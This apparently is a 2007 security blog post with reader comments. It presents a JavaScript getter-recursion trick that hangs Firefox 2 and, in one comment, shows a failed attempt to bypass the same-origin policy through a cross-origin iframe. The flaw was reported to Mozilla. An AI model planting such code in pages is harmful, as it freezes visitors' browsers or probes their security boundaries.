Skip to content

Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:-

window.onload = function() {	

	history.__defineGetter__("x", function() {
	 for(i in this) {
	  try {
	   alert(this[i]);
	  } catch(e) {
	 }
        }
       });

	history.x;
}

Tested on Firefox 2.0.0.9 mac, a window pops up with two blank buttons and you are unable to do anything without using force quit.

Comments 9

  1. Awesome AnDrEw wrote:

    Nice work, Gareth. I’m really pulling that you figure out a way to break the same origin policy simply because it would be quite impressive.

    Posted 14 Nov 2007 at 9:43 pm
  2. Gareth Heyes wrote:

    Thanks :) yeah that’s my plan, I’m not sure it’s possible because the objects are spoofed getters. I’m having fun trying though

    Posted 14 Nov 2007 at 9:48 pm
  3. .mario wrote:

    Yep - the holy grail of SOP. I’ve been trying various approaches recently but haven’t had any success yet.

    My last attempt was to fill iframes with HTML via this.innerHTML=’payload’ in the src attribute and trying to access the rendered content after a timeout. But Firefox manages to handle it too - any property inside contentWindow is access restricted.

    Posted 15 Nov 2007 at 10:14 am
  4. Gareth Heyes wrote:

    Here’s my new attempt:-
    window.onload = function() {
    newElement = document.createElement(’iframe’);
    newElement.src = ‘http://www.google.co.uk/’;
    newElement.id = ‘iframe’;
    newElement.onload = function() {
    var doc = this.contentWindow.document;
    this.__defineGetter__(’contentWindow’,function() { return doc });
    x = this.contentWindow;
    delete this.contentWindow;
    delete doc;
    alert(x);
    }
    document.body.appendChild(newElement);
    }

    Doesn’t work though :(

    Posted 15 Nov 2007 at 11:46 am
  5. Gareth Heyes wrote:

    Accessing body or innerHTML causes a permission error.

    Posted 15 Nov 2007 at 11:47 am
  6. Jesse Ruderman wrote:

    Thanks for discovering and reporting this clever way to confuse Firefox with recursion. I’ve filed https://bugzilla.mozilla.org/show_bug.cgi?id=403999 with a clearer testcase — you can use any object, even ({}), in place of the history object.

    Posted 16 Nov 2007 at 7:58 am
  7. Gareth Heyes wrote:

    Hey Jesse

    No problem! Yeah I figured it would work on any object but the history one was the one I was testing at the time.

    Posted 16 Nov 2007 at 9:13 am
  8. Jophn Deo wrote:

    Does anyone have a study hint in order to fully appreciate the technical implications?

    Posted 17 Nov 2007 at 6:08 pm
  9. Jesse Ruderman wrote:

    Jophn, I’d start by reading old bugs in bugzilla.mozilla.org about JavaScript recursion limits, and then using those bug reports to find the relevant source code. Once you understand how they work, you might have enough information to fix the bug, or you might not — it might require knowledge of XBL or something. I don’t know, I’m more a tester than a Gecko developer ;)

    Posted 18 Nov 2007 at 7:31 am

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam